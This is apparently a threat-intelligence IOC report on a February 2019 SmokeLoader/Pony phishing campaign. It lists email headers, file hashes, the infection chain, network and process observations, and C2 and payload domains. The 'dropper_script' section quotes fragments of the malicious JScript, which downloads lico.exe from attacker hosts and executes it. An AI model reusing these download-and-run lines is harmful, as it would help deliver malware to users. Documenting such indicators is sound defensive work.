#smokeloader_270219

1. #IOC #OptiData #VR #pony #smokeloader #WSH #LZH
2.  
3. https://pastebin.com/Z7zq0YkW
4.  
5. previous contact:
6. https://pastebin.com/b8PkhMyN
7. https://pastebin.com/hkskwKvc
8. https://pastebin.com/JmthzrL4
9. https://pastebin.com/1scwT0f8
10. https://pastebin.com/MP3kCSSh
11.  
12. FAQ:
13. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
14.  
15. attack_vector
16. --------------
17. email attach (lzh) > js > WSH > GET 2 URL > AppData\Roaming\Microsoft\Windows\Templates\??????.exe
18.  
19. email_headers
20. --------------
21. Received: from ds196.mirohost.net (ds196.mirohost.net [89.184.70.56])
22. Received: from [185.143.147.204] (port=50240 helo=nat-204.utels.ua) by ds196.mirohost.net
23. From: Мария Яковенко <buhg@martgroup.com.ua>
24. Subject: рахунки Яковенко М.М.
25. To: "user00" <user00@victim0.com>
26. Reply-To: Мария Яковенко <buhg@martgroup.com.ua>
27. Date: Wed, 27 Feb 2019 11:30:37 +0200
28.  
29. files
30. --------------
31. SHA-256 d388d26267051b6036ec22035883c0d849e7495919b37a09c3d48a4af0094e18
32. File name По работе за февраль.lzh [LHarc 1.x/ARX archive data [lh0]]
33. File size 354.38 KB
34.  
35. SHA-256 11682833800a3ff5e5984de31ecd2f46c53341bc813fbaa9b53af74548d4a03b
36. File name Распределение завхозов.ods [OpenDocument Spreadsheet]
37. File size 19.1 KB
38.  
39. SHA-256 daa2443a7ff973346246d3d92260b8100bdca5054c179688d4df3d164edf4b6a
40. File name Pax. 18-201 - 27.02.2019p..js [ASCII text, with very long lines]
41. File size 335.18 KB
42.  
43. SHA-256 77b488a1904fb2b143e62dd5eedffd487c9e2e451a78bd921b0f4295adafbe7b
44. File name lico.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
45. File size 568.5 KB
46.  
47. activity
48. **************
49.  
50. dropper_script:
51. wsh = new ActiveXObject("wscript.shell");
52. path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
53. HTTP.Open("GET", "http://pomulaniop.icu/iman/lico.exe", false);
54. else
55. HTTP.Open("GET", "http://umileniumkk.ru/iman/lico.exe", false);
56. Stream.SaveToFile(path, 2); Stream.Close(); wsh.exec(path); } }
57.  
58. AppData\Roaming\Microsoft\Windows\Templates\??????.exe
59.  
60. PL_SRC
61. pomulaniop{.} icu/iman/lico.exe
62. umileniumkk{.} ru/iman/lico.exe
63. mileniumkk{.} ru/iman/lico.exe
64.  
65. C2
66. http://aviatorssm{.} bit/
67.  
68. netwrk
69. --------------
70. 89.223.29.17 pomulaniop{.} icu GET /iman/lico.exe HTTP/1.1 Mozilla/4.0
71.  
72. comp
73. --------------
74. wscript.exe 3084 TCP localhost 49233 89.223.29.17 80 ESTABLISHED
75.  
76. proc
77. --------------
78. C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 18-201 - 27.02.2019p..js
79. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\126531.exe
80.  
81. persist
82. --------------
83. n/a
84.  
85. drop
86. --------------
87. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\126531.exe
88.  
89. # # #
90. https://www.virustotal.com/#/file/d388d26267051b6036ec22035883c0d849e7495919b37a09c3d48a4af0094e18/details
91. https://www.virustotal.com/#/file/11682833800a3ff5e5984de31ecd2f46c53341bc813fbaa9b53af74548d4a03b/details
92. https://www.virustotal.com/#/file/daa2443a7ff973346246d3d92260b8100bdca5054c179688d4df3d164edf4b6a/details
93. https://www.virustotal.com/#/file/77b488a1904fb2b143e62dd5eedffd487c9e2e451a78bd921b0f4295adafbe7b/details
94. https://analyze.intezer.com/#/analyses/e63b126a-9b53-43dc-a8bd-a8d8112a6f75
95.  
96. VR
97.  
98. @